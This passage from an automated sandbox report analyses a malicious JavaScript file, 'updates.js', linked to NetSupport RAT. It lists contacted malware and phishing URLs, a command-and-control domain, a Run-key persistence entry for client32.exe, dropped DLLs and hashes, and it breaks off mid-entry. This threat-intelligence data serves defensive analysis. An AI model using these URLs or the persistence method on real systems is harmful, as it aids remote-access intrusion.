                                https://github.com/apache/echarts/issues/142660%Avira URL Cloudsafe
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                https://momentjs.com/0%Avira URL Cloudsafe
                                https://github.com/apache/incubator-echarts/issues/122290%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)0%Avira URL Cloudsafe
                                https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalsCompositeOperation0%Avira URL Cloudsafe
                                https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js0%Avira URL Cloudsafe
                                https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight0%Avira URL Cloudsafe
                                http://194.180.191.69/fakeurl.htm0%Avira URL Cloudsafe
                                https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf0%Avira URL Cloudsafe
                                http://luxurycaborental.com/c100%Avira URL Cloudmalware
                                https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js0%Avira URL Cloudsafe
                                https://github.com/ecomfe/zrender/blob/master/LICENSE.txt0%Avira URL Cloudsafe
                                http://luxurycaborental.com/cdn-vs/data.php?12105100%Avira URL Cloudmalware
                                https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/variableCompositeOperation0%Avira URL Cloudsafe
                                https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js0%Avira URL Cloudsafe
                                https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                luxurycaborental.com
                                		38.180.60.246
                                		truetrue
                                  		unknown
                                  geo.netsupportsoftware.com
                                  		104.26.0.231
                                  		truefalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://194.180.191.69/fakeurl.htmfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://luxurycaborental.com/cdn-vs/data.php?12105true
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://github.com/apache/incubator-echarts/issues/11369wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/apache/echarts/issues/14266wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.jswscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://jsperf.com/try-catch-performance-overheadwscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://jsbench.me/2vkpcekkvw/1)wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://%s/testpage.htmclient32.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://0.30000000000000004.com/wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://127.0.0.1client32.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.jswscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://momentjs.com/wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://%s/fakeurl.htmclient32.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalsCompositeOperationwscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/apache/incubator-echarts/issues/12229wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.jswscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flightwscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdfwscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://luxurycaborental.com/cwscript.exetrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/variableCompositeOperationwscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/ecomfe/zrender/blob/master/LICENSE.txtwscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.jswscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.jswscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    38.180.60.246
                                    		luxurycaborental.comUnited States
                                    		174COGENT-174UStrue
                                    194.180.191.69
                                    		unknownunknown
                                    		39798MIVOCLOUDMDfalse
                                    104.26.0.231
                                    		geo.netsupportsoftware.comUnited States
                                    		13335CLOUDFLARENETUSfalse

                                    General Information

                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1475034
                                    Start date and time:2024-07-17 15:18:51 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 45s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:updates.js
                                    Detection:MAL
                                    Classification:mal100.rans.troj.expl.evad.winJS@8/28@2/3
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HCA Information:
                                    • Successful, ratio: 77%
                                    • Number of executed functions: 160
                                    • Number of non-executed functions: 211
                                    Cookbook Comments:
                                    • Found application associated with file extension: .js

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 612 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: updates.js

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:19:55API Interceptor46x Sleep call for process: powershell.exe modified
                                    09:20:32API Interceptor6880819x Sleep call for process: client32.exe modified
                                    15:20:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BTGEEENA C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                    15:20:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BTGEEENA C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    38.180.60.246Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • luxurycaborental.com/cdn-vs/33per.php?8980
                                    http://luxurycaborental.comGet hashmaliciousUnknownBrowse
                                    • luxurycaborental.com/favicon.ico
                                    http://sherwoodhomeshow.comGet hashmaliciousUnknownBrowse
                                    • sherwoodhomeshow.com/favicon.ico
                                    104.26.0.231updates.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    q8m0iSxPqZ.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    q8m0iSxPqZ.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    VtZtwUsgtrnEnlkxHy.ps1Get hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    SecureClientInstaller.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    IN___T9ZEKNFSIJ.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    IN___ODZ4JE3VG1.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    geo.netsupportsoftware.comupdates.jsGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    17851032425.zipGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    q8m0iSxPqZ.exeGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    q8m0iSxPqZ.exeGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    file.exeGet hashmaliciousNetSupport RAT, LummaC Stealer, NetSupport DownloaderBrowse
                                    • 172.67.68.212
                                    SAPConcur.msixGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    MDE_File_Sample_fb7baecc9f46e01492b4e3e6409d6c73f83a1169.zipGet hashmaliciousNetSupport RATBrowse
                                    • 172.67.68.212
                                    luxurycaborental.comUpdate 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 38.180.60.246
                                    http://luxurycaborental.comGet hashmaliciousUnknownBrowse
                                    • 38.180.60.246

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    MIVOCLOUDMDupdates.jsGet hashmaliciousNetSupport RATBrowse
                                    • 94.158.245.103
                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 94.158.245.103
                                    yvM2XCEkGj.exeGet hashmaliciousRaccoon Stealer v2Browse
                                    • 5.181.159.42
                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                    • 94.158.245.103
                                    xUtQLCJLoN.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    GsPg7N8T6N.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    ZNxa7TSWl4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    fj5cuMFGnv.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    J33Y3d3zTW.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    0ilcDpXPQz.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    COGENT-174USVyuhx7175I.elfGet hashmaliciousMiraiBrowse
                                    • 154.59.168.194
                                    yHIoCL9LQV.elfGet hashmaliciousMiraiBrowse
                                    • 38.16.239.184
                                    botx.arm6.elfGet hashmaliciousMiraiBrowse
                                    • 206.148.136.18
                                    Salary Increament.exeGet hashmaliciousFormBookBrowse
                                    • 38.238.30.20
                                    9RogliUNrK3XMIU.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • 206.119.184.153
                                    e-transac- RP062024 Nominal-PPI2452246 20240712NISPIDJA010O0100000503.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • 38.47.232.233
                                    file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • 38.47.158.160
                                    http://newbetter.click/Get hashmaliciousUnknownBrowse
                                    • 143.244.42.33
                                    https://telegram-up.org/Get hashmaliciousUnknownBrowse
                                    • 38.34.166.72
                                    Confirmation Receipt02001859.pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 50.7.82.90
                                    CLOUDFLARENETUShttps://click.pstmrk.it/3s/vxoo5khbb.cc.rs6.net%2Ftn.jsp%3Ff%3D001nq3Wi79XAdx2DYKBld4MAwmyhXXhgc7VLsIk7b5E2gITQuJPashiG7OTiR0O3RIiwnhj2ty2TuUM6xkyIaRNemPFYX6AF7DAyvtgxkYGkeQvSRUQ6135x2_i_de3ws1sFRciJOeEU5oIpgu-U6VGHt8IZ551S53f8HacVwWJNAfWwIOK3UCKWlg5Y-qtkHNT-R3x9Z3grsxMYfWQ0x3pep3bPZHA9sMgYP-iT5mOC5iWPsqWwU-hwEaABAmwn-5z_FQ5ojt-DX0nmnCpDQtyAarXA_Wp9koxK02jCrXEDBeIcsw2JeMzRaNiUWuNa0exMI18P6D7nER4R_cX4pGBuO4xx0PdaVaLRIeD7Jcv4HUjoQP5gHDLDpQ-Ey65HHTdvBqcf5dc6FF63f4dXZbOKfdHfIsYhFu262NqL6o-Q-_u_tmBzOC0ts0yQVTDJoAtp2MRwLNQTlcpNayrF-t_brji0ktjGzDcFFeDWt22WF2uqJ51xopAGpvjMsSDH9IRvCgO9LHfMnxo9lLYXWRdka6bcFl55wqouyPHNHxOy3etX87LI0y2L0E2FC2PcfdXhOjTXEbuyka3X0yTnbBYYKQorEIKMan_%26c%3D%26ch%3D/YI-Q/8rC2AQ/AQ/008d513f-b8c5-4dcf-8189-f5222a46a18a/1/HUr46-BRTpGet hashmaliciousUnknownBrowse
                                    • 104.18.69.40
                                    Payslip-17 July, 2024-jL7YT6rW3BrETRvBjEHUYPjcVgPBCpGb12c.htmGet hashmaliciousHTMLPhisherBrowse
                                    • 104.17.25.14
                                    ziprar.exeGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    https://1wv.ephypsyne.com/V50J/#ZGFuaWVsQHByZW1pZXItZXhwZXJ0cy5kZQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                    • 104.17.25.14
                                    https://aibarchitekturundingenieurb-my.sharepoint.com/:b:/g/personal/t_busse_aib-wunstorf_de/EfTtyWJ_6mZLtwbulDFbIzsBZ0WVmJyURtaKqboeQU4_QA?e=4%3ajqH4fa&at=9&xsdata=MDV8MDJ8dGhvbWFzLnBpc2FyZWNrQGJhaG5iYXVncnVwcGUuY29tfDk3YzhhMDAwNWI4MjQ1NGI1MDEyMDhkY2E2M2I5NDExfGExYTcyZDljNDllNjRmNmQ5YWY2NWFhZmExMTgzYmZkfDB8MHw2Mzg1NjgwMjIwMTgyNzU0Mjh8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDB8fHw%3d&sdata=ZHNwRFRERnBUU1pkcittWm9zSm5WL1RmRWp4NGJUdFlnTTNKNFhyZEY1Zz0%3d&CT=1721205545099&OR=Outlook-Body&CID=D2CB98FB-50C6-4BC6-AD7C-F22043AA39AF&wdLOR=c388932A2-1A87-4E95-A4D5-717B51965EFBGet hashmaliciousHTMLPhisherBrowse
                                    • 1.1.1.1
                                    https://cdn.ftspecialist.exponea.com/banking1/e/.eJxtj79Lw0AYhqEogj8QAi5ONzqYXGybRs_BKogiothJKqKX3pf07CWpl69NhS6u4lYc3PwfXFykm3-BS0ddFRc3UbS2o27v-zzL-xrkNvO1nlyXS25zBua-tzr7l-yju_J2P_LyPl9__XyYXa4i1hNGaZqmlsejmowCLZMaj4SGoKE4yjiyKnFINZw2IEHT1wAmasnVwuP5bkdd9VbZ1HimkRhj0KrHEXA20a-hMQohl4qxfqkY-bVSiZhkGxBBE1_HIcEqEBASY90XO5AmaihNkl20bMfK5st7lHqxOKPIPQUUh1lTFENy4Bz-hf-RQRaySbm3mROOAw74OZu7vlvItgczj6RgPJY-WAHXQkagixokyqCqUPz-b3vOkgd2wc-DawOviJPJ45Z6upu-6T1fdDd-AIWVhUs.KWXE6tw-ildG4w/clickGet hashmaliciousUnknownBrowse
                                    • 104.18.43.42
                                    https://pub-8ffae7e163d64ee9b90d8cfcccbd4d95.r2.dev/autoloadmicrosoft.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                    • 104.17.2.184
                                    PayOut_Adjustment_235120098.docxGet hashmaliciousUnknownBrowse
                                    • 104.17.2.184
                                    https://link.mail.beehiiv.com/ls/click?upn=u001.E5t9nwiEOPNvgobT-2BLaXeMhYdk9-2BQdwTj2CsMF2n8QMzkCwf5eGWjlurhQzQLU3cnXpNS5x1E1KS2g5AulN68rpCnkV5GfBtbF8n-2FDYBaEJ0WLmIDPEKmp7aArClqydUCFbVdqfaE3etu-2FRZX7mzQCCWWVwr6PVJYhdZHmD-2FXlO1R7OTmBD5NXPBXdy81FvE9XFQ_kaZbegZM04h14TrhJ-2FVOzqhv2Vmod0DMeh3Yk9TPE2TN0J9eS6m9v-2BigFT7IzuUCWzV-2FX9OVvQ2jwwWP8HM5Z6-2F-2BsRgPIgedDW7InO8xOpCQaw1ZWg2ZK8vJgl9LAAJUKvfB-2FgPHZ4omB3crMTZ8i-2FuNYERjO8v97VxCs6mhGUInTunkUBk-2FyuL9x3ccmLJR-2FRRD9JS141Vpmf8AIMJI7q27vU7FXpiYZU8XG8R97uaZVDMrui4lvoonrJJnsuAxfoyR1q-2FWaxjDp4p91jikRpcfhEyyFe7j3My-2F7m1CvG8Gt97aJZt7qIb-2ByPJ4bBX4lDN4QQ-2F7T5M7FC64Hl9uwS59ch1dNR1SrKnkeLq-2FGsfsw8IcDkaz90PjrTMayL0eFtPuDUm7dySNB-2FAr-2BCK0RRpxgyv60MFOWTZnK-2BkI6HjZuo-2FkT7aNAcnJH372lO4l#michael_dunder@office.comGet hashmaliciousHTMLPhisherBrowse
                                    • 104.17.25.14
                                    transfiere copia para entrega del pedido 8791.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.13.205

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLLupdates.jsGet hashmaliciousNetSupport RATBrowse
                                      Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                        updates.jsGet hashmaliciousNetSupport RATBrowse
                                          Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                            Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                              MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse
                                                update.jsGet hashmaliciousNetSupport RATBrowse
                                                  Update_122.0.616.jsGet hashmaliciousNetSupport RATBrowse
                                                    BILL93607.jsGet hashmaliciousNetSupport RATBrowse
                                                      http://gg.gg/carzzz#fyGet hashmaliciousNetSupport RATBrowse
                                                        C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLLupdates.jsGet hashmaliciousNetSupport RATBrowse
                                                          Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                            updates.jsGet hashmaliciousNetSupport RATBrowse
                                                              Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                  MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse
                                                                    update.jsGet hashmaliciousNetSupport RATBrowse
                                                                      Update_122.0.616.jsGet hashmaliciousNetSupport RATBrowse
                                                                        BILL93607.jsGet hashmaliciousNetSupport RATBrowse
                                                                          http://gg.gg/carzzz#fyGet hashmaliciousNetSupport RATBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\loca[1].htm

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:modified
                                                                            Size (bytes):16
                                                                            Entropy (8bit):3.077819531114783
                                                                            Encrypted:false
                                                                            SSDEEP:3:llD:b
                                                                            MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                            SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                            SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                            SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:40.7357,-74.1724

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1524
                                                                            Entropy (8bit):5.388328299240194
                                                                            Encrypted:false
